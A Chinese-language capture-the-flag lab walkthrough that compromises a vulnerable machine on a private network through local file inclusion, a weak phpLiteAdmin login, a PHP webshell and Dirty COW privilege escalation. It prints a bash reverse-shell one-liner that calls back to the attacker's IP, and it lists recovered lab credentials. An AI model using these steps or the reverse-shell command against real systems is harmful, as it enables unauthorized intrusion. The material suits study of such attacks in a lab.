前言

靶机ip（192.168.110.128）
攻击机ip（192.168.110.127）
网络NAT模式

这段时间一直在忙别的事，有两个礼拜没有学习了，哈哈哈

信息收集

打开网站每个页面都简单看了看，发现一个很明显的LFI，先记录下来肯定能用上

继续看就没有什么东西了，网页功能也比较简单，现在再来扫一下目录

很明显是数据库，手试了一波弱口令给我进去了，就是admin

漏洞挖掘

简单说一下
phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具
注意他的版本，这个版本是存在 php远程代码执行漏洞的
-----参考链接----


root：34kroot34
zico：zico2215@
尝试用 ssh 连接不行，会被检验

利用 phpliteadmin 写入一句话，正好可以利用最开始发现的文件包含来执行代码拿shell，就很舒服
数据库名我就叫 caidao.php

echo "bash -i >& /dev/tcp/192.168.110.127/2333 0>&1" | bash URL编码一下直接弹 shell


在 zico 用户下发现 WordPress，打开配置文件发现了一串密码


再次尝试 ssh 连接成功了

查看系统内核，尝试脏牛提权，具体怎么提权就不多说了，都是常规操作，可以看看我的这篇文章
-----------脏牛提权--------

这个时候 root 用户已经变成了我们这个

直接拿 flag

总结

又是老套路了，拿到shell然后脏牛提权拿 root，可见脏牛有多出名
在实战中也还是有很多老机器是运行着旧版本的linux且没有打补丁，所以懂的都懂，哈哈哈